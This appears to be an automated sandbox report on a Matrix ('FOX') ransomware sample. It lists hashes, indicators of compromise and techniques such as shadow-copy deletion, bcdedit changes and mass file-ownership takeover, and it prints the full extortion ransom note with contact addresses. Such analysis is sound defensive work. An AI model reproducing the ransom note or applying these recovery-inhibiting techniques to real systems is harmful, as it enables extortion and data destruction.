matrix | 016061f330faaeffdd84628f613a719a2f617c8145909d047b5721429ee5b451

Analysis

max time kernel
147s
max time network
119s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
03-04-2024 17:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Size

1.2MB
MD5

268360527625d09e747d9f7ab1f84da5
SHA1

09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
SHA256

42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
SHA512

07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
SSDEEP

24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 471D5351CE96D8D5\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 471D5351CE96D8D5\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 dZSOU4ib\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{4d8dcf8c-a72a-43e1-9833-c12724db736e}\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Chess\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Mahjong\ja-JP\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Purble Place\ja-JP\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\amd64\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\FreeCell\fr-FR\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{57a73df6-4ba9-4c1d-bbbb-517289ff6c13}\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Roaming\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M221U1AY\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Checkers\it-IT\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Hearts\ja-JP\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\SpiderSolitaire\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Media Player\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Hearts\de-DE\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Microsoft Games\Hearts\it-IT\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Users\Admin\Music\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3688	bcdedit.exe
1792	bcdedit.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
9	1472	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	95Y5ZjHg64.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	95Y5ZjHg64.exe

Executes dropped EXE 64 IoCs

pid	Process
2500	NWK46EMN.exe
4040	95Y5ZjHg.exe
1912	95Y5ZjHg64.exe
540	95Y5ZjHg.exe
1564	95Y5ZjHg.exe
1628	95Y5ZjHg.exe
3448	95Y5ZjHg.exe
2080	95Y5ZjHg.exe
3424	95Y5ZjHg.exe
4188	95Y5ZjHg.exe
2280	95Y5ZjHg.exe
4124	95Y5ZjHg.exe
764	95Y5ZjHg.exe
912	95Y5ZjHg.exe
1928	95Y5ZjHg.exe
3720	95Y5ZjHg.exe
3404	95Y5ZjHg.exe
4256	95Y5ZjHg.exe
4344	95Y5ZjHg.exe
4436	95Y5ZjHg.exe
4892	95Y5ZjHg.exe
3396	95Y5ZjHg.exe
4640	95Y5ZjHg.exe
2148	95Y5ZjHg.exe
4820	95Y5ZjHg.exe
4320	95Y5ZjHg.exe
4296	95Y5ZjHg.exe
4804	95Y5ZjHg.exe
4684	95Y5ZjHg.exe
4504	95Y5ZjHg.exe
4472	95Y5ZjHg.exe
4996	95Y5ZjHg.exe
5016	95Y5ZjHg.exe
5064	95Y5ZjHg.exe
5100	95Y5ZjHg.exe
2876	95Y5ZjHg.exe
3352	95Y5ZjHg.exe
3880	95Y5ZjHg.exe
3872	95Y5ZjHg.exe
4856	95Y5ZjHg.exe
4900	95Y5ZjHg.exe
2752	95Y5ZjHg.exe
3748	95Y5ZjHg.exe
2060	95Y5ZjHg.exe
3004	95Y5ZjHg.exe
1528	95Y5ZjHg.exe
1568	95Y5ZjHg.exe
2980	95Y5ZjHg.exe
2584	95Y5ZjHg.exe
2556	95Y5ZjHg.exe
2784	95Y5ZjHg.exe
964	95Y5ZjHg.exe
2716	95Y5ZjHg.exe
1196	95Y5ZjHg.exe
1908	95Y5ZjHg.exe
3608	95Y5ZjHg.exe
3944	95Y5ZjHg.exe
3636	95Y5ZjHg.exe
2568	95Y5ZjHg.exe
2992	95Y5ZjHg.exe
1508	95Y5ZjHg.exe
2032	95Y5ZjHg.exe
664	95Y5ZjHg.exe
2200	95Y5ZjHg.exe

Loads dropped DLL 64 IoCs

pid	Process
2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
2908	42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
3936	cmd.exe
4040	95Y5ZjHg.exe
3140	cmd.exe
2084	cmd.exe
3164	cmd.exe
3228	cmd.exe
2964	cmd.exe
3168	cmd.exe
4168	cmd.exe
2956	cmd.exe
3380	cmd.exe
1176	cmd.exe
3976	cmd.exe
3620	cmd.exe
3392	cmd.exe
1620	cmd.exe
4244	cmd.exe
356	cmd.exe
4380	cmd.exe
4404	cmd.exe
4484	cmd.exe
4652	cmd.exe
4780	cmd.exe
4532	cmd.exe
4312	cmd.exe
4292	cmd.exe
4348	cmd.exe
4460	cmd.exe
4500	cmd.exe
4720	cmd.exe
4992	cmd.exe
4956	cmd.exe
4576	cmd.exe
5048	cmd.exe
3548	cmd.exe
4952	cmd.exe
3816	cmd.exe
1436	cmd.exe
3844	cmd.exe
3864	cmd.exe
3444	cmd.exe
3972	cmd.exe
1784	cmd.exe
1604	cmd.exe
1860	cmd.exe
2348	cmd.exe
2416	cmd.exe
2064	cmd.exe
2588	cmd.exe
3516	cmd.exe
3272	cmd.exe
2800	cmd.exe
2220	cmd.exe
1956	cmd.exe
2644	cmd.exe
2624	cmd.exe
2296	cmd.exe
2976	cmd.exe
2460	cmd.exe
2620	cmd.exe
3752	cmd.exe
2868	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3596	takeown.exe
4968	takeown.exe
2492	takeown.exe
2772	takeown.exe
5096	takeown.exe
2508	takeown.exe
2004	takeown.exe
1748	Process not Found
4860	takeown.exe
4560	takeown.exe
1532	takeown.exe
3336	takeown.exe
1968	takeown.exe
2128	takeown.exe
2800	Process not Found
2180	takeown.exe
2500	takeown.exe
1192	takeown.exe
2480	takeown.exe
4488	takeown.exe
1348	takeown.exe
3928	takeown.exe
2144	takeown.exe
4176	Process not Found
400	takeown.exe
4776	takeown.exe
5008	takeown.exe
4892	takeown.exe
4072	takeown.exe
1452	takeown.exe
3908	takeown.exe
4308	takeown.exe
1436	takeown.exe
2540	takeown.exe
1608	takeown.exe
5040	takeown.exe
3120	takeown.exe
568	takeown.exe
3312	takeown.exe
5048	takeown.exe
2104	takeown.exe
4284	takeown.exe
2876	takeown.exe
3684	Process not Found
4948	takeown.exe
4164	takeown.exe
1528	takeown.exe
3604	takeown.exe
